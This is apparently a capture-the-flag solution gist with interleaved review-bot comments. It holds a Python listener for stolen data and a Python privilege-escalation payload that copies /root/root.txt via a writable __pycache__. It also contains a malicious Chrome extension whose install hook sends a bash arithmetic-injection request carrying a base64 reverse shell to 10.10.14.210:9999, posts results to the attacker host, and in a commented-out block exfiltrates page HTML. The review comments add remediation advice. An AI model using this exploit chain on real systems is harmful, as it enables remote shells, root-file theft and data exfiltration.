sharpicx revised this gist
Jan 30, 2026 . 1 changed file with 30 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,30 @@ from http.server import HTTPServer, BaseHTTPRequestHandler import base64 from pwn import log from urllib.parse import unquote class SyncHandler(BaseHTTPRequestHandler): def do_POST(self): content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length).decode('utf-8') try: raw_decoded = base64.b64decode(post_data).decode('utf-8') final_data = unquote(raw_decoded) log.success(f"Incoming from {self.client_address[0]}:") print(final_data) print() except Exception as e: log.warning(f"Decode error: {e}") self.send_response(204) self.end_headers() def log_message(self, format, *args): return if __name__ == '__main__': server_address = ('0.0.0.0', 8081) httpd = HTTPServer(server_address, SyncHandler) try: httpd.serve_forever() except KeyboardInterrupt: log.warning("Exiting...") -
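Review bot: `content_length = int(self.headers['Content-Length'])` in `do_POST` sits outside the `try`, so a request without that header raises before any response is sent, and the `rfile.read` that follows has no upper bound on what a client can make the process buffer. Move the parse inside the `try` and cap it, for example `content_length = min(int(self.headers.get('Content-Length') or 0), MAX_BODY)`, where `MAX_BODY` is a constant you define. The decoded body is also printed verbatim although it comes from the network; printing `repr(final_data)` or stripping control characters keeps terminal escape sequences out of the console. The listener binds `0.0.0.0`, so binding only the interface that is actually needed would narrow who can reach it.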
sharpicx revised this gist
Jan 30, 2026 . 1 changed file with 12 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,12 @@ # insecure permission at /opt/extensiontool/__pycache__ # read this blog really helpful by @xct: https://vuln.dev/vulnlab-odori/ # # python3 -m compileall extension_utils.py --invalidation-mode unchecked-hash # sudo /opt/extensiontool/extension_tool.py # Traceback (most recent call last): # File "/opt/extensiontool/extension_tool.py", line 5, in <module> # from extension_utils import validate_manifest, clean_temp_files # ImportError: cannot import name 'validate_manifest' from 'extension_utils' (/opt/extensiontool/extension_utils.py) import os os.system("cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt") -
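Review bot: The header comment names the finding (`insecure permission at /opt/extensiontool/__pycache__`) but not why it matters or how it is closed, which is what someone maintaining that host needs. I would add `# root cause: a sudo-run script imports from a directory whose __pycache__ is writable by an unprivileged user; unchecked-hash .pyc files are loaded without being compared to the .py source` and `# fix: make /opt/extensiontool and its __pycache__ root-owned and not group/world-writable`. For detection, a `.pyc` in a privileged import path whose header flags mark it as hash-based and unchecked (PEP 552), while the rest of the tree uses timestamp-based caches, is worth alerting on.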
sharpicx created this gist
Jan 30, 2026 .There are no files selected for viewing
@@ -0,0 +1,58 @@ // https://dev.to/greymd/eq-can-be-critically-vulnerable-338m // https://ya.maya.st/d/201909a.html // https://www.nccgroup.com/research-blog/shell-arithmetic-expansion-and-evaluation-abuse/ // https://github.com/koalaman/shellcheck/issues/3088 chrome.runtime.onInstalled.addListener(async () => { const lhost = "10.10.14.210"; const serverPort = "8081"; const flaskAddr = "http://127.0.0.1:5000"; const revShell = "echo${IFS}L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEwLzk5OTkgMD4mMSI=|base64${IFS}-d|bash"; const payload = `xxx[$(${revShell})]`; const targetUrl = `${flaskAddr}/routines/${encodeURIComponent(payload)}`; try { await fetch(targetUrl, { mode: "no-cors" }); await fetch(`http://${lhost}:${serverPort}/loot`, { method: "POST", mode: "no-cors", body: btoa("Payload Sent to Flask: " + targetUrl), keepalive: true, }); } catch (e) { await fetch(`http://${lhost}:${serverPort}/loot`, { method: "POST", mode: "no-cors", body: btoa("Fetch Failed: " + e.toString()), keepalive: true, }); } }); // const serverAddr = "10.10.14.210"; // const serverPort = "8081"; // const targetHost = "http://browsedinternals.htb"; // async function pushData(payload) { // const b64 = btoa(unescape(encodeURIComponent(payload))); // await fetch(`http://${serverAddr}:${serverPort}/loot`, { // method: "POST", // mode: "no-cors", // body: b64, // }); // } // chrome.tabs.create({ url: targetHost, active: false }, (tab) => { // chrome.tabs.onUpdated.addListener(function listener() { // chrome.tabs.onUpdated.removeListener(listener); // chrome.scripting.executeScript( // { // target: { tabId: tab.id }, // func: () => document.documentElement.outerHTML, // }, // async (results) => { // await pushData(results[0].result); // chrome.tabs.remove(tab.id); // }, // ); // }); // }); This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. 
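Review bot: Nothing in the file says what server-side behaviour the `/routines/<value>` request depends on; the only hint is the four links at the top. A short comment would make the finding and its remediation readable without following them, for example `// root cause (per the links above): the path segment presumably reaches a shell numeric comparison, where bash evaluates array subscripts arithmetically` followed by `// fix: accept only ^[0-9]+$ for that parameter before it is handed to the shell`. On the service side, request paths under `/routines/` that contain `[`, `$(` or `${IFS}` are straightforward to log and reject. The commented-out block after the listener is an unrelated earlier approach and would be clearer removed or kept in its own file.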
To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,11 @@ { "manifest_version": 3, "name": "abc", "version": "1.0", "description": "abc", "permissions": ["tabs", "scripting", "<all_urls>"], "host_permissions": ["<all_urls>", "*://*/*"], "background": { "service_worker": "background.js" } }
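Review bot: `"<all_urls>"` is listed inside `permissions`, but it is a host match pattern, and Manifest V3 expects host patterns in `host_permissions` only, so that entry is at best redundant; `"*://*/*"` also largely overlaps with the `"<all_urls>"` already in `host_permissions`. The active code in the service worker only issues `fetch` calls, while `tabs` and `scripting` are used solely by the commented-out block, so the requested set is wider than what runs. For anyone gating which extensions get loaded into a browser, `scripting` plus all-hosts access plus a background `service_worker` is the combination to flag at review time, since it allows reading any page the browser opens.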